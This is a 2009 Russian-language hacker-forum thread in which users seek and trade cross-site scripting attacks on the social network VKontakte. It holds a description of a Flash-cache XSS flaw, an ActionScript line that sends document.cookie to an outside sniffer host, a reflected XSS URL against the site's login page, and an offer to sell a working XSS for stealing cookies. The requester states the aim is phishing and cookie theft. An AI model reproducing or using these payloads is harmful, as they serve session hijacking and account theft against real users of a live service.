xss VKONTAKTE

Discussion in 'Социальные сети' started by Ylka, 8 Jan 2009.

  1. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5
    На многих форумах и сайтах я встричал ето :

    В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.

    Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

    Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

    Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1


    Как ето здєлать ???
    Помогите написать FLASH
     
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    давно уже неактуально :(
     
  3. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5
    Ну и что всеодно очень нужно помогите
     
  4. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    возми любой учеьник по флеш....
     
  5. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5
    Как можна взять льбую FLASH і впихнути в ее JAVA которий будєт потом виполнят скрипт і которий будєт входити на сайт фейк І подскажите што нада туда впихнути
     
  6. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5
    В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.

    Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

    Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

    Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1

    Пример атаки:

    http://vkontakte.ru/apps.php?act=s&id=15… (новое окно открывается через 2 секунды)




    Как ето здєлать ?????
     
  7. Executor-666

    Executor-666 Member

    Joined:
    8 Dec 2008
    Messages:
    0
    Likes Received:
    19
    Reputations:
    0
    эх были такие милые приложения,которые автоматически создавали группы.
     
  8. Executor-666

    Executor-666 Member

    Joined:
    8 Dec 2008
    Messages:
    0
    Likes Received:
    19
    Reputations:
    0
    мне бы найти эту программку,что бы группы регить,а потом просматривать номера групп,сечешь тему)
     
  9. Executor-666

    Executor-666 Member

    Joined:
    8 Dec 2008
    Messages:
    0
    Likes Received:
    19
    Reputations:
    0
    ну ,хз,кому то может быть и актуальна
     
  10. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5
    Мне етот способ актуален
    Подскажити он счас работает вконтакте ????
     
    #10 Ylka, 16 Jan 2009
    Last edited: 16 Jan 2009
  11. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5

    Например што ???
     
  12. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    сделай во флэше красивую кнопку Play, на ней замути что-то типа

    Code:
    getURL("http://rulix.h18.ru/?+document.cookie");
     
  13. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5

    На снифер или на што ???
     
  14. Carbonm

    Carbonm Guest

    Reputations:
    0
    могу продать пассивку 50$. работает 100%! (уже cookies воровал) ICQ семь 7 шесть 33600
     
  15. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку
     
  16. Whirt

    Whirt Elder - Старейшина

    Joined:
    24 Jun 2008
    Messages:
    23
    Likes Received:
    86
    Reputations:
    5
    t3cHn0iD , респект , если сам нашел. работает)) правда скоро прикроют)
     
  17. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Есть и другие варианты (но о них попозже =)))
     
    #17 t3cHn0iD, 8 Apr 2009
    Last edited: 8 Apr 2009
  18. Ylka

    Ylka Banned

    Joined:
    3 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    5
    А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?
     
  19. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    с ее помощью можно уроки выучить =\
     
  20. Carbonm

    Carbonm Guest

    Reputations:
    0
    можно